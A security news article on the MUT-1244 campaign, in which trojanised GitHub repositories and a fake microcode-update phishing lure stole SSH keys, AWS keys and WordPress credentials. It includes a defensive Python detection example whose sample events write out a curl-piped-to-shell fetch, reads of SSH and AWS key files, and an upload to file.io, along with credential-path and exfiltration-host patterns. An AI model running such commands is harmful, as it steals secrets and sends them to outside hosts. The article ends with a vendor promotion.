
WordPress Supply Chain Hack Exposes Over 390,000 User Credentials

WordPress users have fallen victim to a massive credential theft campaign executed by a threat actor known as MUT-1244. A large-scale attack involving a compromised WordPress plugin exposed over 390,000 login credentials.

MUT-1244 has been connected to a year-long operation that targets WordPress users. This large-scale attack is part of a broader campaign involving phishing schemes and compromised GitHub repositories. These repositories hosted malicious proof-of-concept (PoC) code designed to exploit known security vulnerabilities.

Researchers at Datadog Security Labs revealed that the stolen data included SSH private keys and AWS access keys from hundreds of victims. These victims ranged from attackers themselves to penetration testers and security experts.

According to researchers Adrian Korn, Matt Muir, and Christophe Tafani-Dereeper:

Victims are believed to be offensive actors – including pentesters and security researchers, as well as malicious threat actors – and had sensitive data such as SSH private keys and AWS access keys exfiltrated.

How Attackers Leveraged GitHub and Phishing to Compromise User Credentials

Attackers delivered payloads from GitHub projects using a variety of techniques, such as compromised npm packages, malicious PDFs, backdoored configuration files, and Python droppers.

Datadog Security Labs claims that this effort is similar to a supply-chain attack detected by Checkmarx in November. In that instance, malicious code in the “0xengine/xmlrpc” npm package was used to trojanise the “hpc20235/yawp” GitHub project, enabling the mining of Monero cryptocurrency and data theft.

MUT-1244 used malware with a cryptocurrency miner and a backdoor to steal sensitive information such as private SSH keys, AWS passwords, environment variables, and directory contents (e.g., ~/.aws).

Figure: Software Supply Chain Attack (Datadog Security Labs)

A separate platform-hosted second-stage payload allowed data exfiltration to services such as Dropbox and file.io. Investigators also uncovered hardcoded credentials in the payload, which gave attackers instant access to stolen data.

Attackers also used phishing emails to trick academics into visiting fraudulent sites. These pages posed as kernel upgrade instructions, telling victims to open a terminal and execute a shell command.

MUT-1244 successfully compromised users with a second-stage payload by infiltrating computers through phishing emails and trojanised GitHub repositories. In the phishing path, the lure deceived victims into installing a fake kernel update, disguised as a CPU microcode fix.

Korn added:

The repository contained the phishing email itself, as well as a database of 2,758 target emails scraped from arXiv, a platform for research papers. The phishing email is titled “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox” and asks the victim to install a fake kernel upgrade.

Figure: Fake Microcode Update Phishing Email (Datadog Security Labs)

According to reports, the yawpp GitHub project enabled the theft of approximately 390,000 passwords, mostly for WordPress accounts. Its users were themselves threat actors who had acquired these credentials illegally; when they ran the trojanised tool, the credentials were exfiltrated to a Dropbox account under MUT-1244's control. The researchers estimated the number of exposed credentials from their telemetry and third-party threat data.

The attack disrupted the software development process by compromising commonly used libraries and tools. Once deployed, the malicious code could reach a variety of downstream applications and systems.

Using popular code-sharing sites like GitHub as an attack vector highlights the critical need for robust verification mechanisms and real-time threat detection in development workflows.

It is important to teach employees, including security teams, to spot phishing attacks, particularly when attackers impersonate routine operational tasks like kernel updates. Early threat detection can be achieved by monitoring for unusual activity, especially around cloud credential access, GitHub, or WordPress.
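The behaviours described in this article (a fetched script piped to a shell, reads of SSH keys and ~/.aws, then an upload to Dropbox or file.io) can be correlated per process tree. The following is an added detection example, not code from Datadog or the article; the audit-style event rows, host names and process ids are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed process events in a simplified audit-log shape (not from the
# article or Datadog's data): (pid, parent pid, command line, outbound host).
SAMPLE_EVENTS = [
    (101, 1,   "bash -c 'curl -s http://updates.example.invalid/kernel-fix | sh'", None),
    (102, 101, "cat /home/dev/.ssh/id_rsa", None),
    (103, 101, "tar czf /tmp/a.tgz /home/dev/.aws", None),
    (104, 101, "curl -F file=@/tmp/a.tgz https://file.io", "file.io"),
    (200, 1,   "git push origin main", "github.com"),
    (201, 1,   "ssh -i /home/dev/.ssh/id_rsa build@ci.example.invalid", "ci.example.invalid"),
]

PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")
CREDENTIAL_PATHS = re.compile(r"/\.(ssh|aws)/|/\.aws\b|(^|/)\.env\b")
EXFIL_HOSTS = {"dropbox.com", "www.dropbox.com", "content.dropboxapi.com", "file.io"}

def root_of(pid, parents):
    """Walk the parent chain up to the top-level process (parent is 1 or unknown)."""
    seen = set()
    while parents.get(pid) not in (None, 1) and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid

def analyse(events):
    """Return {root pid: severity} for process trees showing the campaign's combination."""
    parents = {pid: ppid for pid, ppid, _, _ in events}
    signals = defaultdict(set)
    for pid, _, cmd, host in events:
        root = root_of(pid, parents)
        if PIPE_TO_SHELL.search(cmd):
            signals[root].add("pipe_to_shell")
        if CREDENTIAL_PATHS.search(cmd):
            signals[root].add("credential_access")
        if host and host.lower() in EXFIL_HOSTS:
            signals[root].add("exfil_host")
    alerts = {}
    for root, s in signals.items():
        # A single signal is common in legitimate use (ssh -i, git push);
        # credential access plus an upload to a file-sharing host is what matters.
        if {"credential_access", "exfil_host"} <= s:
            alerts[root] = "HIGH" if "pipe_to_shell" in s else "MEDIUM"
    return alerts

if __name__ == "__main__":
    for root, sev in analyse(SAMPLE_EVENTS).items():
        print(f"process tree {root}: {sev}")
```

The process tree rooted at pid 101 is flagged HIGH; the developer's own ssh and git activity produces no alert.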

Phishing attacks are on the rise, and it is important to protect your organisation. One effective way to do this is by increasing user awareness about these types of attacks. Phishing Tackle is a great resource that can help you in this regard. They offer a free 14-day trial to help train your users to recognise and avoid phishing attacks. 

Although technology can be helpful, it cannot spot 100% of phishing emails. Therefore, user education is important to minimising the impact of any successful attacks. Consulting with Phishing Tackle can provide valuable insights and tools to help you strengthen your defences against phishing attacks.
